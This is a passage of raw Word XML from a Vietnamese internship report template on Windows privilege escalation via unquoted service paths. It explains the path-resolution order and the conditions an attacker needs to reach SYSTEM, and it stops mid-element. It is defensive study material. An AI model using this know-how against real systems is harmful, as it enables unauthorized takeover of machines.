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27FA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>BỘ GIÁO DỤC VÀ ĐÀO TẠO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HỌC VIỆN NÔNG NGHIỆP VIỆT NAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>KHOA CÔNG NGHỆ THÔNG TIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>------------------------***------------------------</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B23AD5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>BÁO CÁO THỰC TẬP TỐT NGHIỆP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>ĐỀ TÀI:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>NGHIÊN CỨU KỸ THUẬT LEO THANG ĐẶC QUYỀN TRÊN WINDOWS THÔNG QUA LỖ HỔNG UNQUOTED SERVICE PATH VÀ ĐỀ XUẤT GIẢI PHÁP PHÒNG NGỪA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6B1CC7">
      <w:pPr>
        <w:ind w:left="2000"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện:  [Họ và tên sinh viên]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mã số sinh viên:     [Mã số sinh viên]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lớp/Chuyên ngành:    [Tên lớp và chuyên ngành, ví dụ: ATTT / CNTT]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ sở thực tập:      [Tên doanh nghiệp/Cơ quan nơi thực tập]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giảng viên hướng dẫn: [Họ và tên Giảng viên hướng dẫn]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cán bộ hướng dẫn:     [Họ và tên Cán bộ tại doanh nghiệp]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDC06A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>[Tỉnh/Thành Phố], Năm 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6DB99">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20195E04">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>LỜI CẢM ƠN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85661C">
      <w:r>
        <w:t>[NỘI DUNG LỜI CẢM ƠN: Sinh viên tự điền lời cảm ơn đến Nhà trường, Khoa, Giảng viên hướng dẫn và Công ty nơi thực tập đã tạo điều kiện giúp đỡ hoàn thành kỳ thực tập và báo cáo này].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB4CDE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="561AE9AD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304911E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Tính cấp thiết của đề tài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECA832">
      <w:r>
        <w:t>Trong xu thế chuyển đổi số mạnh mẽ của các doanh nghiệp và tổ chức hiện nay, an toàn thông tin (ATTT) đã trở thành một yếu tố then chốt quyết định sự sống còn của hệ thống hạ tầng CNTT. Hệ điều hành Microsoft Windows hiện đang chiếm thị phần áp đảo trên cả môi trường máy trạm (Workstation) và máy chủ doanh nghiệp (Enterprise Server). Do đó, Windows luôn là mục tiêu tấn công hàng đầu của các tin tặc và các chiến dịch tấn công có chủ đích (APT).</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Trong chuỗi mô hình tấn công chuẩn hóa Cyber Kill Chain hoặc ma trận MITRE ATT&amp;CK, sau khi kẻ tấn công có được quyền truy cập ban đầu (Initial Access) vào một tài khoản có đặc quyền thấp, bước tiếp theo mang tính quyết định là leo thang đặc quyền (Privilege Escalation). Nếu không thể nâng quyền, tầm ảnh hưởng và khả năng phá hoại của kẻ tấn công sẽ bị giới hạn nghiêm ngặt. Lỗ hổng cấu hình đường dẫn dịch vụ không nằm trong dấu ngoặc kép - Unquoted Service Path (được định danh trong ma trận MITRE ATT&amp;CK dưới mã T1574.009 - Hijack Execution Flow: Path Interception by Unquoted Path) là một lỗi cấu hình sai (misconfiguration) cực kỳ phổ biến. Lỗi này thường phát sinh trong quá trình cài đặt các phần mềm của bên thứ ba (Third-party software) vào hệ thống. Mặc dù cơ chế kỹ thuật rất cơ bản, nhưng hậu quả của nó lại vô cùng nghiêm trọng khi cho phép một tài khoản người dùng bình thường chiếm đoạt hoàn toàn đặc quyền cao nhất hệ thống (NT AUTHORITY\SYSTEM). Chính vì lý do đó, việc chọn đề tài nghiên cứu kỹ thuật này và đề xuất giải pháp phòng ngừa toàn diện mang ý nghĩa khoa học và thực tiễn rất lớn, giúp doanh nghiệp chủ động rà quét và b bịt kín các lỗ hổng nguy hiểm trước khi bị khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5C4B6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Mục tiêu nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651EA681">
      <w:r>
        <w:t>- Về mặt lý thuyết: Nghiên cứu chuyên sâu về kiến trúc quản lý tiến trình và dịch vụ (Windows Services) nền tảng của hệ điều hành Windows; hiểu rõ cơ chế biên dịch logic chuỗi ký tự của hàm API CreateProcess().</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Về mặt thực nghiệm: Xây dựng thành công phòng thí nghiệm ảo (Virtual Lab) an toàn để hiện thực hóa kỹ thuật tấn công, kiểm thử các công cụ rà quét lỗi tự động và mã độc thực thi payload khai thác.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Về mặt giải pháp: Đề xuất các phương án phòng thủ đa tầng (Defense-in-Depth) bao gồm sửa lỗi trực tiếp cấu hình hệ thống, tối ưu hóa phân quyền Access Control List (ACL) và xây dựng năng lực giám sát phát hiện sớm thông qua Windows Event Forwarding và luật SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DEC994">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Đối tượng và phạm vi nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA60A71">
      <w:r>
        <w:t>- Đối tượng nghiên cứu: Kỹ thuật leo thang đặc quyền cục bộ (Local Privilege Escalation) trên Windows thông qua Unquoted Service Path (MITRE ATT&amp;CK T1574.009).</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Phạm vi nghiên cứu: Các phiên bản hệ điều hành Windows thông dụng hiện nay bao gồm Windows 10, Windows 11 và Windows Server (2016/2019/2022). Quá trình thực nghiệm được tiến hành hoàn toàn cách ly trong môi trường Lab ảo hóa, không gây ảnh hưởng đến hệ thống mạng sản xuất (Production) thực tế tại đơn vị thực tập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC71D5">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Phương pháp nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461663FD">
      <w:r>
        <w:t>- Phương pháp nghiên cứu lý thuyết: Thu thập, phân tích tài liệu kỹ thuật chuẩn hóa quốc tế của Microsoft Developer Network (MSDN), ma trận tri thức MITRE ATT&amp;CK, tài liệu đào tạo chuyên gia an toàn thông tin Certified Ethical Hacker (CEH v13) thuộc EC-Council.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Phương pháp thực nghiệm: Sử dụng các giải pháp ảo hóa (như VMware Workstation, Oracle VirtualBox) để xây dựng hệ thống Lab, cài đặt hệ điều hành Parrot OS/Kali Linux đóng vai trò máy tấn công và Windows đóng vai trò nạn nhân lỗi cấu hình; sử dụng các công cụ pentest tiêu chuẩn như Metasploit Framework, PowerUp script để kiểm chứng kết quả nâng quyền thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CA0CF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FDFEB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 1: TỔNG QUAN VỀ ĐƠN VỊ THỰC TẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E5EBA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1. Giới thiệu tổng quan về đơn vị thực tập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE2396">
      <w:r>
        <w:t>[NỘI DUNG ĐỂ TRỐNG - SINH VIÊN TỰ ĐIỀN: Giới thiệu tên cơ quan/doanh nghiệp thực tập, lịch sử hình thành, quy mô, lĩnh vực hoạt động chính, thông tin địa chỉ liên hệ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20331391">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.2. Cơ cấu tổ chức và chức năng các phòng ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E9D250">
      <w:r>
        <w:t>[NỘI DUNG ĐỂ TRỐNG - SINH VIÊN TỰ ĐIỀN: Sơ đồ tổ chức bộ máy quản lý của đơn vị, chức năng cụ thể của phòng CNTT hoặc Trung tâm An ninh mạng/SOC nơi sinh viên trực tiếp tham gia thực tập...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847DD26">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.3. Khảo sát thực trạng hạ tầng CNTT và chính sách ATTT tại doanh nghiệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA3704">
      <w:r>
        <w:t>[NỘI DUNG ĐỂ TRỐNG - SINH VIÊN TỰ ĐIỀN: Mô tả sơ lược về số lượng máy trạm, máy chủ Windows/Linux, các giải pháp bảo mật đang dùng như Firewall, Endpoint Antivirus, Active Directory...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64922D40">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4. Vị trí thực tập, nhiệm vụ được giao và kế hoạch thực tập chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C460D">
      <w:r>
        <w:t>[NỘI DUNG ĐỂ TRỐNG - SINH VIÊN TỰ ĐIỀN: Nêu rõ vị trí công việc thực tập, các mốc thời gian thực hiện công việc từ tuần 1 đến tuần cuối, vai trò trách nhiệm của bản thân...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2CD6A1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1202FF4C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 2: CƠ SỞ LÝ THUYẾT VỀ KIẾN TRÚC WINDOWS SERVICE VÀ LỖ HỔNG UNQUOTED SERVICE PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55274843">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1. Kiến trúc hệ thống Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1B4EC">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1.1. Khái niệm và vai trò của Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6685D">
      <w:r>
        <w:t>Windows Services (Dịch vụ Windows) là các ứng dụng nền chạy đặc thù trong hệ điều hành Windows mà không yêu cầu người dùng phải đăng nhập (interactive user logon) vào giao diện đồ họa. Chúng đảm nhận các tác vụ cốt lõi, hoạt động liên tục ở chế độ background như: dịch vụ mạng (DHCP, DNS), quản lý in ấn (Print Spooler), máy chủ web (IIS), hoặc các phần mềm quản trị hệ thống và rà quét virus của bên thứ ba. Vai trò của dịch vụ giúp hệ thống tự động hóa vận hành ngay từ khi máy tính vừa khởi động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417646BE">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1.2. Thành phần Service Control Manager (SCM) và cấu trúc Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5AF859">
      <w:r>
        <w:t>Service Control Manager (SCM) là thành phần lõi đóng vai trò như một máy chủ RPC (Remote Procedure Call) chịu trách nhiệm quản lý, điều phối việc khởi chạy, tạm dừng và tắt các dịch vụ trên Windows. Mọi thông tin cấu hình chi tiết của từng dịch vụ được lưu trữ tập trung trong cấu trúc cơ sở dữ liệu hệ thống Windows Registry tại đường dẫn chính xác sau:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Trong mỗi khóa dịch vụ, giá trị chuỗi mang tên 'ImagePath' chứa thông tin cấu hình quan trọng nhất: đường dẫn tuyệt đối trỏ tới tập tin thực thi nhị phân (.exe) của dịch vụ đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCA137">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1.3. Các loại tài khoản đặc quyền thực thi hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70917971">
      <w:r>
        <w:t>Khi một dịch vụ hoạt động, nó phải gán quyền ngữ cảnh thực thi (security context) dưới một tài khoản cụ thể. Các dịch vụ hệ thống thường được chạy dưới các tài khoản đặc quyền mặc định bao gồm:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- NT AUTHORITY\SYSTEM (LocalSystem): Tài khoản có đặc quyền cao nhất, kiểm soát hoàn toàn mọi tài nguyên phần cứng, tiến trình hệ thống, vượt trội hơn cả tài khoản Administrator cục bộ.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- NT AUTHORITY\LocalService: Tài khoản có đặc quyền hạn chế đối với các tài nguyên cục bộ và không có quyền truy cập mạng ẩn danh.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- NT AUTHORITY\NetworkService: Tài khoản có quyền hạn chế trên máy cục bộ nhưng có khả năng tương tác, xác thực tài nguyên trong mạng nội bộ Active Directory thông qua tài khoản máy (Computer Account).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1041D69A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2. Tiến trình xử lý hệ thống và Cơ chế Phân giải Đường dẫn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41866DDB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2.1. Hàm API CreateProcess và thuật toán diễn giải chuỗi ký tự</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A220B5A">
      <w:r>
        <w:t>Khi SCM hoặc một ứng dụng muốn tạo ra một tiến trình mới, hệ thống sẽ gọi hàm API CreateProcess() (hoặc các biến thể CreateProcessA/CreateProcessW). Theo tài liệu MSDN chính thức của Microsoft, tham số đầu tiên `lpApplicationName` và tham số thứ hai `lpCommandLine` truyền vào hàm quyết định cách Windows tìm kiếm file nhị phân. Nếu đường dẫn truyền vào chứa ký tự khoảng trắng (space character) và KHÔNG được bao bọc bởi cặp dấu ngoặc kép '"', thuật toán phân giải đường dẫn (Path Resolution Heuristics) của Windows sẽ đọc chuỗi từ trái qua phải, tự động diễn giải mỗi khoảng trắng là một dấu phân cách giữa tên file thực thi và các tham số dòng lệnh đi kèm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518779B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2.2. Nguyên nhân cốt lõi gây ra lỗi cấu hình Unquoted Service Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75E9C6">
      <w:r>
        <w:t>Nguyên nhân cốt lõi hoàn toàn do lỗi cấu hình sai từ phía lập trình viên hoặc kỹ sư đóng gói bộ cài đặt phần mềm (MSI/EXE installer). Khi đăng ký dịch vụ vào Registry ImagePath, họ lưu chuỗi thô chứa khoảng trắng (ví dụ các thư mục mặc định như C:\Program Files\ hoặc C:\Program Files (x86)\) nhưng quên thêm các ký tự escape hoặc cặp ngoặc kép để bọc chuỗi. Sự kết hợp giữa: (1) Đường dẫn chứa khoảng trắng, (2) Thiếu dấu ngoặc kép, và (3) Cơ chế heuristic mặc định của Windows API chính là tác nhân gốc rễ sinh ra lỗ hổng bảo mật này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E08496">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3. Phân tích chi tiết kỹ thuật leo thang đặc quyền (MITRE ATT&amp;CK T1574.009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BEBA01">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.1. Mô hình logic phân giải chuỗi ký tự lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFC474">
      <w:r>
        <w:t>Xét một ví dụ cụ thể về một dịch vụ có ImagePath bị cấu hình lỗi như sau:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>C:\Program Files\Enterprise Software\Advanced Agent\service.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Khi dịch vụ khởi chạy, do không có dấu ngoặc kép bao quanh chuỗi, Windows API sẽ phân tích chuỗi đường dẫn và cố gắng tìm kiếm, thực thi các tệp tin theo thứ tự ưu tiên logic nghiêm ngặt như sau:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>1. Hệ thống coi 'C:\Program' là file thực thi, phần còn lại là tham số. Hệ thống tìm file: C:\Program.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>2. Nếu không có, hệ thống tìm tiếp khoảng trắng kế tiếp. Tìm file: C:\Program Files\Enterprise.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>3. Tiếp tục tìm khoảng trắng kế tiếp. Tìm file: C:\Program Files\Enterprise Software\Advanced.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>4. Cuối cùng, nếu không có file nào ở trên tồn tại, hệ thống mới thực thi đường dẫn gốc: C:\Program Files\Enterprise Software\Advanced Agent\service.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EAAAE2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3.2. Điều kiện cần và đủ để khai thác tấn công nâng quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51BFFF">
      <w:r>
        <w:t>Để một kẻ tấn công cục bộ (Local Attacker) có thể leo thang đặc quyền (Privilege Escalation) thành công lên nhóm quyền tối cao thông qua lỗi này, hệ thống mục tiêu phải thỏa mãn đồng thời hai điều kiện tiên quyết:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Điều kiện 1 (Cấu hình dịch vụ): Dịch vụ tồn tại lỗi Unquoted Service Path và dịch vụ đó được cấu hình chạy dưới ngữ cảnh tài khoản đặc quyền cao, lý tưởng nhất là NT AUTHORITY\SYSTEM.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Điều kiện 2 (Phân quyền thư mục): Người dùng đặc quyền thấp (Standard User/Authenticated Users) phải được cấp quyền Ghi (Write) hoặc Tạo tệp tin (Create Files/Append Data) tại một trong các thư mục cha nằm trên chuỗi phân giải (ví dụ thư mục cài đặt ứng dụng của bên thứ ba).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B85E4">
      <w:pPr>
        <w:pStyle w:val="4"/>
